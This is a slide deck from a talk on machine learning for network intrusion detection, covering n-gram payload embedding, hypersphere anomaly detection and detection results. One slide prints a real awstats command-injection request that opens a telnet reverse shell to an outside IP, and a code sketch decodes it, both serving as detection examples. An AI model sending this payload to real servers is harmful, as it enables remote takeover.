![Page 1: Machine Learning for Network Intrusion Detection Dr. Marius Kloft, Dipl.-Math. TexPoint fonts used in EMF. Read the TexPoint manual before you delete this](https://reader030.vdocuments.us/reader030/viewer/2022032703/56649d055503460f949d8fb9/html5/thumbnails/1.jpg)
Machine Learning
for Network Intrusion Detection
Dr. Marius Kloft, Dipl.-Math.
Personal Information
• Dr. Marius Kloft
▫ Studies
Physics and mathematics at the University of Marburg
Computer science in Berkeley and Berlin
▫ Degrees
Dipl.-Mathematiker, 2006 (thesis in pure mathematics)
Dr. rer. nat., 2011 (thesis in computer science and statistics)
• PhD advisors
▫ Prof. Dr. Klaus-Robert Müller
(EECS, TU Berlin)
▫ Prof. Dr. Peter L. Bartlett
(EECS & Statistics, UC Berkeley)
▫ Prof. Dr. Gilles Blanchard
(Statistics, Uni Potsdam)
Berkeley, California
Dr. Marius Kloft
• Current occupation
▫ Post-Doc
jointly appointed at
Machine Learning Laboratory, TU Berlin
▫Head: Prof. Dr. Klaus-Robert Müller
Friedrich-Miescher Laboratory, Max Planck Society, Tübingen
▫Head: Dr. Gunnar Rätsch
(will be transferred to Sloan Center for Cancer Research, New York)
• I am heading the SeqML project team (Berlin/Tübingen)
▫ 2 PhD students
▫ 4 Master students
▫ PI: Prof. Müller
▫ Goal
Development of intelligent algorithms (“machine learning”) for computational genome annotation
Dr. Marius Kloft
• Research interests
▫ Statistical machine learning methods
Development of new algorithms
▫mathematical optimization thereof
Analysis of their statistical properties
▫ in terms of probabilistic bounds
Multiple Kernel Learning
▫My PhD thesis: “Lp-Norm Multiple Kernel Learning”
▫ Applications
Detection of genes in genomic DNA
Detection of attacks in computer networks
Categorization of images
Machine Learning Laboratory, TU Berlin
• Some facts
▫ Head
Prof. Dr. Klaus-Robert Müller
▫ Scientists
11 post-Docs
35 PhD students
▫ Research focus
Development of novel intelligent algorithms
▫ for analysis of complex data
• Remind project
▫ Joint project of TU Berlin and Fraunhofer FIRST, Berlin
▫ Development of intelligent methods for detecting intrusions in computer networks
▫ Facts
Until 2010
▫2 post-docs
▫5 PhD students
Spin-off “Trifense GmbH” was awarded first prize in the „Gründungswettbewerb“ start-up competition (BMWi)
Machine Learning for Intrusion Detection
Joint work with the members of the Remind project team:
Konrad Rieck, Pavel Laskov, Ulf Brefeld, Christian Gehl, Tammo Krüger,
Patrick Düssel, Nico Görnitz, Rene Gerstenberger, Guido Schwenk
Machine Learning for Intrusion Detection
Talk Overview
Danger from the internet
What is machine learning (ML)?
Algorithms for intrusion detection
Empirical analysis
Danger from the Internet
• Internet as a risk factor:
▫ Omnipresence of computer worms, viruses and trojans
▫ Major damage to companies and customers
▫ Increasing criminalization
Why do we still get hacked?
• New vulnerabilities are discovered
▫ 2,000-3,000 vulnerabilities per year
• New attacks are developed
▫ high degree of automation
• Incident response is too slow
How secure are modern detection tools?
• Experiment
▫ Current instances of malware were collected from a Nepenthes honeypot
▫ Files were scanned with Avira AntiVir
• Results
▫ First scan:
▫ Second scan:
• Conclusion
▫ After four weeks, 15% of the malware instances were still not recognized!
What is statistical machine learning?
• Given:
▫ Data $x_1, \ldots, x_n$
E.g., $x_i$ could be an HTTP request (e.g., a computer attack)
▫ Concepts $y_1, \ldots, y_n \in \{0, 1\}$
E.g., $y_i = 1$ could mean that $x_i$ is a computer attack
• Goal:
▫ Finding a function $f$ that models the dependency between $x_i$ and $y_i$
i.e., $\forall i: f(x_i) \approx y_i$
▫ So that $f$ generalizes to novel, previously unseen $(x, y)$
i.e., $f(x) \approx y$
• 2-step approach:
▫ 1. Training:
Input data and concepts into learning algorithm
Learning algorithm outputs $f$
▫ 2. Prediction:
Use $f(x)$ to predict labels $y$ for new, unseen $x$
• Core idea
▫ Choose an $f$ that
Fits the data well
But is not too “complex”
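The two-step approach above can be sketched in a few lines of Python. This is only an illustration under stated assumptions: the toy 2-D vectors, the function name `train`, and the choice of a nearest-centroid rule as the learning algorithm are all hypothetical and do not come from the talk.

```python
def train(xs, ys):
    """Training step: take data xs and concepts ys, return a function f."""
    centroids = {}
    for label in (0, 1):
        members = [x for x, y in zip(xs, ys) if y == label]
        dim = len(members[0])
        # Centroid = coordinate-wise mean of all training points with this label.
        centroids[label] = [sum(x[d] for x in members) / len(members)
                            for d in range(dim)]

    def f(x):
        """Prediction step: return the label of the closest centroid."""
        def sq_dist(c):
            return sum((a - b) ** 2 for a, b in zip(x, c))
        return min(centroids, key=lambda label: sq_dist(centroids[label]))

    return f


# Hypothetical toy data: y = 1 marks an "attack", y = 0 a normal request.
xs = [(0.0, 0.1), (0.2, 0.0), (0.1, 0.3), (2.0, 2.1), (2.2, 1.9), (1.9, 2.3)]
ys = [0, 0, 0, 1, 1, 1]

f = train(xs, ys)                                # 1. Training
predictions = [f((0.1, 0.2)), f((2.1, 2.0))]     # 2. Prediction on unseen x
print(predictions)
```

The learned `f` is deliberately simple: it stores only two centroids, so it fits the toy data without memorizing individual points.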
Example: Trade-off of Fit and Complexity
• Data:
• Which f to choose?
▫ Linear f
Misses two points (too simple)
▫ Polynomial f
Pro: perfect on training data
Contra: does not generalize to new data (too complex)
• Machine learning solution:
▫ Not too complex, not too simple
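One common way to make this trade-off precise, which the slides do not spell out, is regularized empirical risk minimization. In the sketch below, the function class $\mathcal{F}$, the loss $\ell$, the complexity penalty $\Omega$ and the trade-off parameter $\lambda$ are assumed symbols that do not appear in the original.

```latex
\hat{f} \;=\; \operatorname*{arg\,min}_{f \in \mathcal{F}} \;
  \underbrace{\frac{1}{n} \sum_{i=1}^{n} \ell\bigl(f(x_i),\, y_i\bigr)}_{\text{fit to the training data}}
  \;+\; \lambda \, \underbrace{\Omega(f)}_{\text{complexity of } f},
  \qquad \lambda > 0
```

Under this reading, a very small $\lambda$ corresponds to the overly complex polynomial f, and a very large $\lambda$ to the overly simple linear f.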
Benefits of Machine Learning to Intrusion Detection
• Ability to generalize from large amounts of data
▫ automation of decision making
▫ faster incident response times
• Understanding of statistical foundations of empirical inference
▫ better accuracy, low false alarm rates
• Ability to detect novelty
▫ protection against new attacks
What Does Network Payload Look Like?
• Innocuous payload
▫ GET / HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aAccept-Language: en\x0d\x0aAccept-Encoding: gzip, deflate\x0d\x0aCookie: POPUPCHECK=1150521721386\x0d\x0aUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3\x0d\x0aConnection: keep-alive\x0d\x0aHost: www.spiegel.de
• Malicious payload
▫ GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;sleep%207200%7ctelnet%20194%2e95%2e173%2e219%204321%7cwhile%20%3a%20%3b%20do%20sh%20%26%26%20break%3b%20done%202%3e%261%7ctelnet%20194%2e95%2e173%2e219%204321;echo%20YYY;echo|HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\x0d\x0aHost: wuppi.dyndns.org:80\x0d\x0aConnection: Close\x0d\x0a\x0d\x0a
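The malicious request is easier to read once its percent-encoding is undone. The following sketch decodes the query string from the example above using Python's standard `urllib.parse.unquote`; the variable names are illustrative only.

```python
from urllib.parse import unquote

# Query string copied from the malicious request shown above.
encoded = (
    "configdir=|echo;echo%20YYY;sleep%207200%7ctelnet%20194%2e95%2e173%2e219%204321"
    "%7cwhile%20%3a%20%3b%20do%20sh%20%26%26%20break%3b%20done%202%3e%261"
    "%7ctelnet%20194%2e95%2e173%2e219%204321;echo%20YYY;echo|"
)

# Replace every %XX escape with the character it encodes.
decoded = unquote(encoded)
print(decoded)
```

The decoded string shows shell commands (`sleep`, `telnet`, a `while` loop running `sh`) injected into the `configdir` parameter, which is what distinguishes it from the innocuous request.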
From Network Payload to Vectors
• General idea
▫ Count occurrences of substrings (“n-grams”)
▫ Define an appropriate embedding function $\Phi$
▫ In the end, payloads are represented as vectors
Example: $\Phi(\text{"abracadabra"}) = (2, 2, 1, 1, 1, 1, 1)$
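A minimal sketch of such an n-gram embedding is shown below. The slide does not state the n-gram length; n = 3 is an assumption, chosen because it reproduces the example vector for "abracadabra". The function name `ngram_counts` is hypothetical.

```python
from collections import Counter


def ngram_counts(payload, n=3):
    """Count every contiguous substring of length n in the payload."""
    return Counter(payload[i:i + n] for i in range(len(payload) - n + 1))


counts = ngram_counts("abracadabra", n=3)

# Counter keeps n-grams in order of first occurrence:
# abr, bra, rac, aca, cad, ada, dab
vector = tuple(counts.values())
print(dict(counts))
print(vector)
```

To compare different payloads, the vector positions would have to follow one fixed n-gram ordering shared by all payloads; the order of first occurrence is used here only to mirror the single example.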
Detection of New Attacks
• Anomaly-based machine learning approach
▫ Represent network payload as vectors
▫ Find a hypersphere
that encloses the innocuous data (blue circles)
and generalizes to new data
▫ Points outside the hypersphere (red circles)
are flagged as anomalous
(Rieck et al., DIMVA 2007)
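The hypersphere idea can be illustrated with a deliberately simplified variant. The sketch below assumes the center is the mean of the innocuous training vectors and the radius is a chosen quantile of the training distances; this is not necessarily the method of the cited work, and methods such as support vector data description learn center and radius by optimization instead. All names and the toy data are hypothetical.

```python
import math


def fit_hypersphere(vectors, quantile=1.0):
    """Center = mean of the training vectors; radius = quantile of distances."""
    dim = len(vectors[0])
    center = [sum(v[d] for v in vectors) / len(vectors) for d in range(dim)]
    dists = sorted(math.dist(v, center) for v in vectors)
    # quantile=1.0 encloses all training points; smaller values leave some outside.
    index = max(0, math.ceil(quantile * len(dists)) - 1)
    return center, dists[index]


def is_anomalous(x, center, radius):
    """Flag points that fall outside the hypersphere."""
    return math.dist(x, center) > radius


# Hypothetical embedded innocuous payloads (2-D for readability).
normal = [(1.0, 1.0), (1.2, 0.9), (0.8, 1.1), (1.1, 1.2), (0.9, 0.8)]
center, radius = fit_hypersphere(normal)

flags = [is_anomalous((1.0, 1.05), center, radius),   # close to the normal data
         is_anomalous((4.0, 4.0), center, radius)]    # far away from it
print(flags)
```

Choosing a quantile below 1.0 trades a few false alarms on training data for a tighter sphere, which is one simple way to keep the model from being too complex.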
How well does our system work?
• Detection results
▫ Evaluation on a real attack dataset generated by a penetration testing expert
▫ Detection of 80-93% of unknown attacks in HTTP, FTP and SMTP protocols without false alarms
▫ Major improvement in accuracy compared with the standard signature-based IDS Snort
Outlook: Extensions of the Framework
• Active learning
▫ Finding data points
that, when presented to a security expert, maximally help the performance of the system
▫ Problem: which data points to present for labeling?
▫ In a nutshell: focus on points that contain novel, uncertain information
• Automatic feature selection
▫ Payloads can be represented by various feature embeddings
Which feature embedding to take?
▫ “Multiple Kernel Learning” approach:
Use all embeddings simultaneously
▫But take a weighted combination
▫Do it automatically at training time
(e.g., Görnitz, Kloft et al., ACM AISEC 2009, ECML 2009)
(M. Kloft, PhD thesis, 2011)
(e.g., Kloft et al., ACM AISEC 2008, ECML 2009, NIPS 2009, ECML 2010, NIPS 2011, JMLR 2011)
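The "weighted combination" of embeddings can be sketched as a weighted sum of kernels, one per feature embedding. In the example below, the two embeddings (2-gram and 3-gram counts), the linear kernel, and the fixed weights are all assumptions made for illustration; in multiple kernel learning the weights would be learned at training time, which this sketch omits.

```python
from collections import Counter


def ngram_counts(payload, n):
    """Count every contiguous substring of length n in the payload."""
    return Counter(payload[i:i + n] for i in range(len(payload) - n + 1))


def linear_kernel(a, b, n):
    """Inner product of the n-gram count vectors of payloads a and b."""
    ca, cb = ngram_counts(a, n), ngram_counts(b, n)
    return sum(ca[g] * cb[g] for g in ca)  # Counter yields 0 for missing n-grams


def combined_kernel(a, b, weights):
    """Weighted sum of per-embedding kernels; weights maps n -> weight."""
    return sum(theta * linear_kernel(a, b, n) for n, theta in weights.items())


# Hypothetical fixed, non-negative weights; MKL would learn these from data.
weights = {2: 0.5, 3: 0.5}
value = combined_kernel("abracadabra", "abracadabra", weights)
print(value)
```

Setting one weight to zero switches the corresponding embedding off, which is why learning the weights amounts to automatic feature selection.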
Conclusions
• Intrusion detection
▫ Detecting malicious payload in network streams
• Machine learning approach
▫ Embedding of application payloads in vector spaces
▫ Detection of anomalies in embedded data
• Empirical analysis
▫ Detection of 80-93% of unknown attacks
with no false positives
▫ Allows one to find novel attacks